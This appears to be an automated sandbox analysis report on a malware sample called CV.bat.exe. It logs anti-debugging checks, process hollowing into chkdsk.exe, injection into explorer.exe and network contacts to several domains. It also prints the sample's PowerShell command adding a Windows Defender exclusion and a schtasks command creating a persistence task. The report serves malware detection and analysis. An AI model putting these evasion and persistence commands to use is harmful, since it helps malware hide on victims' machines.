Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012DB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01244F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01244F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127E730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0130131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0131070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0131070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012DFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012DFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01318F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01273B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01273B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01318B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01274BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01274BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01274BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01315BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01251B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01251B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012FD380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01272397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01258794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0130138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012837F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01284A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01284A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012FFE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01278E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01258A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01245210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01245210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01245210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01245210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301608 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01263A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125766D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012FB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012FB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0128927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01318A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01249240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01249240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01249240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01249240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01257E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01257E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01257E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01257E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01257E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01257E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0130EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0130AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0130AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012D4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012452A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012452A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012452A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012452A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012452A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01310EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01310EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01310EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012DFE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01272AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012716E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012576E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01318ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012736CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01272ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012FFEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01288EC7 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\CV.bat.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\chkdsk.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\CV.bat.exe

Code function: 8_2_01289910 NtAdjustPrivilegesToken,LdrInitializeThunk,

Source: C:\Users\user\Desktop\CV.bat.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.hipnoterapia.store
Source: C:\Windows\explorer.exe	Network Connect: 91.195.240.94 80
Source: C:\Windows\explorer.exe	Network Connect: 63.141.242.46 80
Source: C:\Windows\explorer.exe	Domain query: www.yaignars.site
Source: C:\Windows\explorer.exe	Domain query: www.miarizzuto.org

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\CV.bat.exe

Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 1200000

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\CV.bat.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\CV.bat.exe	Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
Source: C:\Users\user\Desktop\CV.bat.exe	Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\CV.bat.exe

Memory written: C:\Users\user\Desktop\CV.bat.exe base: 400000 value starts with: 4D5A

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\CV.bat.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\CV.bat.exe	Thread register set: target process: 3452
Source: C:\Windows\SysWOW64\chkdsk.exe	Thread register set: target process: 3452

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\CV.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe
Source: C:\Users\user\Desktop\CV.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe

Source: C:\Users\user\Desktop\CV.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe
Source: C:\Users\user\Desktop\CV.bat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PzKpucfDtCCmww" /XML "C:\Users\user\AppData\Local\Temp\tmpE00F.tmp
Source: C:\Users\user\Desktop\CV.bat.exe	Process created: C:\Users\user\Desktop\CV.bat.exe C:\Users\user\Desktop\CV.bat.exe

Source: explorer.exe, 0000000D.00000000.306683345.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.357832693.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.389587124.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 0000000D.00000000.306683345.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.371469343.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.357832693.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000D.00000000.306683345.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.357832693.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.389587124.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000D.00000000.357133629.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.388287354.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.305607182.0000000001378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CProgmanile
Source: explorer.exe, 0000000D.00000000.306683345.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.357832693.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.389587124.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Users\user\Desktop\CV.bat.exe VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
